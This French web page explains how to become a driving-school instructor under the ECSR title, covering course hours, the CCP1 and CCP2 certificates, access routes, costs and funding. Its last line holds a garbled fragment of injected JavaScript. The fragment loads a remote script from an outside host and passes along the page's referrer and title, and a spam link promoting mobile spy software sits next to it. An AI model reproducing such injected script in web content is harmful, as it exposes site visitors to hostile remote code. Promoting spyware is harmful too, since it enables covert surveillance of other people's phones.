Pour devenir moniteur d’auto-école, il est nécessaire de suivre une formation et d’être titulaire du titre professionnel d’Enseignant de la Conduite et de la Sécurité Routière (ECSR).

Il atteste la maitrise de compétences, d’aptitudes et de connaissances permettant l’exercice d’activités professionnelles qualifiées.

Prérequis
Contrairement au BEPECASER, dont l’obtention nécessitait soit de posséder le Brevet des collèges ou un diplôme reconnu équivalent soit de passer une épreuve de contrôle de niveau permettant d’apprécier le degré de connaissance de la langue française, l’ECSR est accessible à tous sans restriction de niveau, ni concours d’entrée.

Durée de la formation
Le titre professionnel d’enseignant de la conduite et de la sécurité routière (ECSR), nouvelle formation de niveau III (bac + 2, BTS/DUT), est plus longue que le BEPECASER (1 225 heures contre 630 heures pour le BEPECASER). Les 1225 heures se décomposent de la façon suivante :

  • deux modules de 455 heures (soit 910 heures), en centre de formation ;
  • 280 heures, en entreprise ;
  • et 35 heures consacrées aux évaluations et aux examens.

Les centres agréés pour dispenser les formations sont privés à l’exclusion des GRETA (Groupements d’établissements publics d’enseignement). La liste des établissements dispensant la formation à l’ECSR est disponible en préfecture

Le contenu de la formation
L’obtention du titre professionnel d’enseignant de la conduite et de la sécurité routière (ECSR) requiert le validation de deux certificats : le Certificat de Compétences Professionnelles 1 (CCP1) pour former des apprenants conducteurs par des actions individuelles ou collectives dans le respect des cadres réglementaires en vigueur ; le Certificat de Compétences Professionnelles 2 (CCP2) pour sensibiliser l’ensemble des usagers de la route à l’adoption de comportements sûrs et respectueux de l’environnement.

Une personne désirant devenir enseignant de la conduite a deux chemins différents pour y parvenir (voir le paragraphe « Voies d’accès). Elle peut soit s’inscrire dans un centre de formation agréé et suivre l’intégralité de la formation (CCP1 et CCP2).

Dans ce cas, elle va effectuer un stage en entreprise de 105 heures durant lesquelles elle est placée sous la responsabilité d’un enseignant de la conduite et n’est qu’observatrice. Soit, elle peut opter pour une formation en alternance en signant un contrat de professionnalisation avec une auto-école. Dans ce cas, elle peut dès l’obtention de son premier CCP participer activement à l’activité de l’entreprise en donnant des cours en relation avec la thématique du premier CCP obtenu.

Voies d’accès
Il existe trois voies d’accès au titre professionnel ECSR :

  • par une Validation des Acquis de l’Expérience (VAE), qui permet permet d’être dispensé(e) de la formation ;
  • par la formation (parcours continu), en centre de formation ;
  • par la formation (parcours progressif), en auto-école. Le candidat travaille en auto-école avec une autorisation temporaire restrictive d’enseigner (ATRE).

Coût de la formation
Pour les épreuves d’admission il faut généralement compter entre 4 000€ et 6 000€ suivant les organismes de formation. Attention, le titre professionnel ECSR n’est plus accessible aux candidats libres.

Bon à savoir : des organismes tels que les FONGECIF (Fonds de Gestion des Congés Individuels de Formation) ou le fonds social des ASSEDICS aident les salariés et les demandeurs d’emplois à financer leur formation. Les employés administratifs travaillant déjà dans une auto-école peuvent faire financer leur formation par l’ANFA (Association Nationale pour la Formation Automobile).

Une vidéo intéressante qui résume la formation :

Nous mettons à disposition les annales du BEPECASER depuis 2005 en téléchargement.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »; var d=document;var s=d.createElement(‘script’); https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.